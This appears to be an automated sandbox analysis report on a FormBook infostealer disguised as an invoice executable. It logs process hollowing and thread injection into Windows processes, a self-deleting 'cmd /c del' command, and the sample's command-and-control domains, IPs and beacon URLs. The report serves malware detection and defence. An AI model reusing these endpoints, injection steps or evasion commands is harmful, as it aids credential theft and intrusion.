Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D74496 mov eax, dword ptr fs:[00000030h]	7_2_04D74496
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D74496 mov eax, dword ptr fs:[00000030h]	7_2_04D74496
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CC849B mov eax, dword ptr fs:[00000030h]	7_2_04CC849B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D4C450 mov eax, dword ptr fs:[00000030h]	7_2_04D4C450
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D4C450 mov eax, dword ptr fs:[00000030h]	7_2_04D4C450
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CEA44B mov eax, dword ptr fs:[00000030h]	7_2_04CEA44B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CD746D mov eax, dword ptr fs:[00000030h]	7_2_04CD746D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CEAC7B mov eax, dword ptr fs:[00000030h]	7_2_04CEAC7B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CEAC7B mov eax, dword ptr fs:[00000030h]	7_2_04CEAC7B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CEAC7B mov eax, dword ptr fs:[00000030h]	7_2_04CEAC7B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CEAC7B mov eax, dword ptr fs:[00000030h]	7_2_04CEAC7B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CEAC7B mov eax, dword ptr fs:[00000030h]	7_2_04CEAC7B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CEAC7B mov eax, dword ptr fs:[00000030h]	7_2_04CEAC7B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CEAC7B mov eax, dword ptr fs:[00000030h]	7_2_04CEAC7B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CEAC7B mov eax, dword ptr fs:[00000030h]	7_2_04CEAC7B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CEAC7B mov eax, dword ptr fs:[00000030h]	7_2_04CEAC7B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CEAC7B mov eax, dword ptr fs:[00000030h]	7_2_04CEAC7B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CEAC7B mov eax, dword ptr fs:[00000030h]	7_2_04CEAC7B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D71C06 mov eax, dword ptr fs:[00000030h]	7_2_04D71C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D71C06 mov eax, dword ptr fs:[00000030h]	7_2_04D71C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D71C06 mov eax, dword ptr fs:[00000030h]	7_2_04D71C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D71C06 mov eax, dword ptr fs:[00000030h]	7_2_04D71C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D71C06 mov eax, dword ptr fs:[00000030h]	7_2_04D71C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D71C06 mov eax, dword ptr fs:[00000030h]	7_2_04D71C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D71C06 mov eax, dword ptr fs:[00000030h]	7_2_04D71C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D71C06 mov eax, dword ptr fs:[00000030h]	7_2_04D71C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D71C06 mov eax, dword ptr fs:[00000030h]	7_2_04D71C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D71C06 mov eax, dword ptr fs:[00000030h]	7_2_04D71C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D71C06 mov eax, dword ptr fs:[00000030h]	7_2_04D71C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D71C06 mov eax, dword ptr fs:[00000030h]	7_2_04D71C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D71C06 mov eax, dword ptr fs:[00000030h]	7_2_04D71C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D71C06 mov eax, dword ptr fs:[00000030h]	7_2_04D71C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D8740D mov eax, dword ptr fs:[00000030h]	7_2_04D8740D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D8740D mov eax, dword ptr fs:[00000030h]	7_2_04D8740D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D8740D mov eax, dword ptr fs:[00000030h]	7_2_04D8740D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D36C0A mov eax, dword ptr fs:[00000030h]	7_2_04D36C0A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D36C0A mov eax, dword ptr fs:[00000030h]	7_2_04D36C0A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D36C0A mov eax, dword ptr fs:[00000030h]	7_2_04D36C0A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D36C0A mov eax, dword ptr fs:[00000030h]	7_2_04D36C0A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CEBC2C mov eax, dword ptr fs:[00000030h]	7_2_04CEBC2C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D36DC9 mov eax, dword ptr fs:[00000030h]	7_2_04D36DC9
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D36DC9 mov eax, dword ptr fs:[00000030h]	7_2_04D36DC9
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D36DC9 mov eax, dword ptr fs:[00000030h]	7_2_04D36DC9
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D36DC9 mov ecx, dword ptr fs:[00000030h]	7_2_04D36DC9
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D36DC9 mov eax, dword ptr fs:[00000030h]	7_2_04D36DC9
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D36DC9 mov eax, dword ptr fs:[00000030h]	7_2_04D36DC9
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D68DF1 mov eax, dword ptr fs:[00000030h]	7_2_04D68DF1
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CCD5E0 mov eax, dword ptr fs:[00000030h]	7_2_04CCD5E0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CCD5E0 mov eax, dword ptr fs:[00000030h]	7_2_04CCD5E0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D7FDE2 mov eax, dword ptr fs:[00000030h]	7_2_04D7FDE2
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D7FDE2 mov eax, dword ptr fs:[00000030h]	7_2_04D7FDE2
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D7FDE2 mov eax, dword ptr fs:[00000030h]	7_2_04D7FDE2
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D7FDE2 mov eax, dword ptr fs:[00000030h]	7_2_04D7FDE2
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CB2D8A mov eax, dword ptr fs:[00000030h]	7_2_04CB2D8A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CB2D8A mov eax, dword ptr fs:[00000030h]	7_2_04CB2D8A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CB2D8A mov eax, dword ptr fs:[00000030h]	7_2_04CB2D8A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CB2D8A mov eax, dword ptr fs:[00000030h]	7_2_04CB2D8A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CB2D8A mov eax, dword ptr fs:[00000030h]	7_2_04CB2D8A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CE2581 mov eax, dword ptr fs:[00000030h]	7_2_04CE2581
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CE2581 mov eax, dword ptr fs:[00000030h]	7_2_04CE2581
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CE2581 mov eax, dword ptr fs:[00000030h]	7_2_04CE2581
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CE2581 mov eax, dword ptr fs:[00000030h]	7_2_04CE2581
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CEFD9B mov eax, dword ptr fs:[00000030h]	7_2_04CEFD9B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CEFD9B mov eax, dword ptr fs:[00000030h]	7_2_04CEFD9B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D72D82 mov eax, dword ptr fs:[00000030h]	7_2_04D72D82
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D72D82 mov eax, dword ptr fs:[00000030h]	7_2_04D72D82
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D72D82 mov eax, dword ptr fs:[00000030h]	7_2_04D72D82
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D72D82 mov eax, dword ptr fs:[00000030h]	7_2_04D72D82
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D72D82 mov eax, dword ptr fs:[00000030h]	7_2_04D72D82
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D72D82 mov eax, dword ptr fs:[00000030h]	7_2_04D72D82
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D72D82 mov eax, dword ptr fs:[00000030h]	7_2_04D72D82
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CE35A1 mov eax, dword ptr fs:[00000030h]	7_2_04CE35A1
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D805AC mov eax, dword ptr fs:[00000030h]	7_2_04D805AC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D805AC mov eax, dword ptr fs:[00000030h]	7_2_04D805AC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CE1DB5 mov eax, dword ptr fs:[00000030h]	7_2_04CE1DB5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CE1DB5 mov eax, dword ptr fs:[00000030h]	7_2_04CE1DB5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CE1DB5 mov eax, dword ptr fs:[00000030h]	7_2_04CE1DB5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF3D43 mov eax, dword ptr fs:[00000030h]	7_2_04CF3D43
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D33540 mov eax, dword ptr fs:[00000030h]	7_2_04D33540
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D63D40 mov eax, dword ptr fs:[00000030h]	7_2_04D63D40
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CD7D50 mov eax, dword ptr fs:[00000030h]	7_2_04CD7D50
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CDC577 mov eax, dword ptr fs:[00000030h]	7_2_04CDC577
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CDC577 mov eax, dword ptr fs:[00000030h]	7_2_04CDC577
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D3A537 mov eax, dword ptr fs:[00000030h]	7_2_04D3A537
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D88D34 mov eax, dword ptr fs:[00000030h]	7_2_04D88D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D7E539 mov eax, dword ptr fs:[00000030h]	7_2_04D7E539
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CE4D3B mov eax, dword ptr fs:[00000030h]	7_2_04CE4D3B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CE4D3B mov eax, dword ptr fs:[00000030h]	7_2_04CE4D3B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CE4D3B mov eax, dword ptr fs:[00000030h]	7_2_04CE4D3B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CC3D34 mov eax, dword ptr fs:[00000030h]	7_2_04CC3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CC3D34 mov eax, dword ptr fs:[00000030h]	7_2_04CC3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CC3D34 mov eax, dword ptr fs:[00000030h]	7_2_04CC3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CC3D34 mov eax, dword ptr fs:[00000030h]	7_2_04CC3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CC3D34 mov eax, dword ptr fs:[00000030h]	7_2_04CC3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CC3D34 mov eax, dword ptr fs:[00000030h]	7_2_04CC3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CC3D34 mov eax, dword ptr fs:[00000030h]	7_2_04CC3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CC3D34 mov eax, dword ptr fs:[00000030h]	7_2_04CC3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CC3D34 mov eax, dword ptr fs:[00000030h]	7_2_04CC3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CC3D34 mov eax, dword ptr fs:[00000030h]	7_2_04CC3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CC3D34 mov eax, dword ptr fs:[00000030h]	7_2_04CC3D34

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.theyogirunner.com
Source: C:\Windows\explorer.exe	Domain query: www.kladios.com
Source: C:\Windows\explorer.exe	Network Connect: 37.48.65.148 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.28ji.site
Source: C:\Windows\explorer.exe	Network Connect: 104.232.96.207 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.hireinone.xyz
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.pecon.pro
Source: C:\Windows\explorer.exe	Network Connect: 85.159.66.93 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.kingguardgroup.com
Source: C:\Windows\explorer.exe	Domain query: www.rebeccannemontgomery.net
Source: C:\Windows\explorer.exe	Network Connect: 35.205.61.67 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.closetofaurora.com
Source: C:\Windows\explorer.exe	Domain query: www.letstrumpbiden.com
Source: C:\Windows\explorer.exe	Domain query: www.goodlukc.com
Source: C:\Windows\explorer.exe	Network Connect: 69.162.102.218 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 121.254.178.252 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.0.229.108 80	Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Section loaded: unknown target: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Thread register set: target process: 3424			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Thread register set: target process: 3424			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe

Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: AE0000

Jump to behavior

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Process created: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe 'C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe'			Jump to behavior

Source: explorer.exe, 00000005.00000000.684754948.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000005.00000000.658255568.0000000001080000.00000002.00000001.sdmp, raserver.exe, 00000007.00000002.914263948.0000000003540000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.658255568.0000000001080000.00000002.00000001.sdmp, raserver.exe, 00000007.00000002.914263948.0000000003540000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.658255568.0000000001080000.00000002.00000001.sdmp, raserver.exe, 00000007.00000002.914263948.0000000003540000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.658255568.0000000001080000.00000002.00000001.sdmp, raserver.exe, 00000007.00000002.914263948.0000000003540000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000005.00000000.673760254.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe

Code function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405B88

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.704410667.00000000008C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.914114145.0000000003000000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.704436953.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.914091207.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.704410667.00000000008C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.914114145.0000000003000000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.704436953.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.914091207.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Process Injection512	Virtualization/Sandbox Evasion3	OS Credential Dumping	Security Software Discovery131	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Shared Modules1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection512	LSASS Memory	Virtualization/Sandbox Evasion3	Remote Desktop Protocol	Clipboard Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information3	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing11	LSA Secrets	File and Directory Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery13	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Proforma Invoice and Bank swift-REG.PI-0086547654.exe	29%	Virustotal		Browse
Proforma Invoice and Bank swift-REG.PI-0086547654.exe	30%	ReversingLabs	Win32.Spyware.Noon
Proforma Invoice and Bank swift-REG.PI-0086547654.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsp24F7.tmp\System.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\nsp24F7.tmp\System.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
7.2.raserver.exe.51c7960.5.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
7.2.raserver.exe.30cde50.2.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
0.0.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1137482	Download File
0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1137482	Download File
2.0.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1137482	Download File
2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
www.theyogirunner.com	0%	Virustotal		Browse
closetofaurora.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.kingguardgroup.com/dp3a/?GR-d=+9xVWhQ3YZdKS9LSdJD9Q5IGOGjZWYGRUC/PBrhb5+8EiR866LajmsNw/hU5zOKELtJS&nPTdU=-ZoHnNt0frfd2Hn	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.hireinone.xyz/dp3a/?GR-d=gNGby8oVX6PgZB5GWA7CusOGqzi3GywYGs/3OTvKjB1NulubMkWwqj/edMXwHBCob9Lh&nPTdU=-ZoHnNt0frfd2Hn	0%	Avira URL Cloud	safe
http://www.28ji.site/dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=/zMHFgDZZhoYLr+uNA/LZaIwAqqHNoUyccNHiXKU1Oc8waRhqa0xV5lesUE3sQ0wja+H	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.rebeccannemontgomery.net/dp3a/?GR-d=ayCA4X1Kl09ymHiLnx81tYxQpS3YxUUFxhK9zdH9kq/gCaIMsyBIYQcEhhLQSA14VAsf&nPTdU=-ZoHnNt0frfd2Hn	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.pecon.pro/dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=qfgFr8ieK4pb0oEJahXrwfByJwdYjuIB81dpFpRA2DwOSKuw2QjIPW4nYRzvvZDFGDPJ	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
